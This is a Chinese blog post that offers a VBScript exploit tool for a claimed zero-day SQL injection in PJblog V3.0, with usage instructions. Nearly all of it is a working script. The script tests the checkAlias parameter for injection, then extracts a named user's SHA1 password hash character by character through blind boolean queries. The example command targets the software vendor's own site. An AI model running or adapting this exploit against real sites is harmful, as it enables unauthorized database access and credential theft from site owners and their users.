23

PJblog V3.0 0day Vbs版漏洞利用工具

发表评论 分类:技术专题 | 标签: | 690 views

漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:
 

  1. If WScript.Arguments.Count <> 2 Then
  2.         WScript.Echo “Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名”
  3.         WScript.Echo “Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam”
  4.         WScript.Quit
  5. End If
  6.  
  7. attackUrl = WScript.Arguments(0)
  8. attackUser = WScript.Arguments(1)
  9. attackUrl = Replace(attackUrl,“\”,”/“)
  10. If Right(attackUrl , 1) <> ”/“ Then
  11.         attackUrl = attackUrl & ”/
  12. End If
  13. SHA1Charset = ”123456789ABCDEFJ
  14. strHoleUrl = attackUrl & ”ction.asp?action=checkAlias&cname=0kee“”
  15.  
  16. If IsSuccess(strHoleUrl & ”r “”1“”=“”1“) And Not IsSuccess(strHoleUrl & ”and “”1“”=“”2“) Then
  17.         WScript.Echo ”恭喜!存在漏洞
  18. Else
  19.         WScript.Echo ”没有检测到漏洞
  20.         WScript.Quit
  21. End If
  22.  
  23. For n=1 To 40
  24.         For i=1 To 17
  25.                 strInject = strHoleUrl & ” Or 0<(Select Count(*) From blog_member Where mem_name=‘” & attackUser & ”‘ And mem_password>=’” & strResult & Mid(SHA1Charset, i, 1) & ”‘) And ”"1″”=”"1″
  26.                 If Not IsSuccess(strInjectThen
  27.                         strResult = strResult & Mid(SHA1Charseti-11)
  28.                         Exit For
  29.                 End If
  30.                 strPrint = chr(13) & “Password(SHA1): ” & strResult & Mid(SHA1Charseti1)                
  31.                 WScript.StdOut.Write strPrint
  32.         Next
  33. Next
  34. WScript.Echo Chr(13) & Chr (10) & “Done!”
  35.  
  36. Function PostData(PostUrl)
  37.     Dim Http
  38.     Set Http = CreateObject(“msxml2.serverXMLHTTP”)
  39.     With Http
  40.         .Open “GET”,PostUrl,False
  41.         .Send ()
  42.         PostData = .ResponseBody
  43.     End With
  44.     Set Http = Nothing
  45.     PostData =bytes2BSTR(PostData)
  46. End Function
  47.  
  48.  
  49. Function bytes2BSTR(vIn)
  50.     Dim strReturn
  51.     Dim IThisCharCodeNextCharCode
  52.     strReturn = “”
  53.     For I = 1 To LenB(vIn)
  54.         ThisCharCode = AscB(MidB(vInI1))
  55.         If ThisCharCode < &H80 Then
  56.             strReturn = strReturn & Chr(ThisCharCode)
  57.         Else
  58.             NextCharCode = AscB(MidB(vInI + 11))
  59.             strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
  60.             I = I + 1
  61.         End If
  62.     Next
  63.     bytes2BSTR = strReturn
  64. End Function
  65.  
  66. Function IsSuccess(PostUrl)
  67.  
  68. strData = PostData(PostUrl)
  69. ‘Wscript.Echo strData
  70. if InStr(strData,“check_error”) >0 then
  71.         IsSuccess = True
  72. Else
  73.         IsSuccess = False
  74. End If
  75. ‘Wscript.Sleep 500 ’让系统休息一下
  76. End Function
  77.  
  78.  
  79.  
  80.  

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

from:http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html

没有评论

  • (Required)
  • (Required, will not be published)

注意: 评论者允许使用'@user空格'的方式将自己的评论通知另外评论者。例如, ABC是本文的评论者之一,则使用'@ABC '(不包括单引号)将会自动将您的评论发送给ABC。使用'@all ',将会将评论发送给之前所有其它评论者。请务必注意user必须和评论者名相匹配(大小写一致)。

  • 关于BLOG

    本站架设在MyHost123上,由CentOS强力驱动

  • 分类目录

  • 那些句子

    “生活中不只有C++,代码和编程,还有更多的东西值得我们去体味,朋友,亲人,爱人都更值得花时间与他们在一起。走出办公室,离开计算机,去亲近大自然,享受美餐,散散步,打打球。拥有美好的生活才能创造出完美的程序。”—Boost程序库完全开发指南

  • 近期文章

  • 标签云

  • 我的饭否

    饭否

  • 赞助商链接

  • 已屏蔽的傻逼评论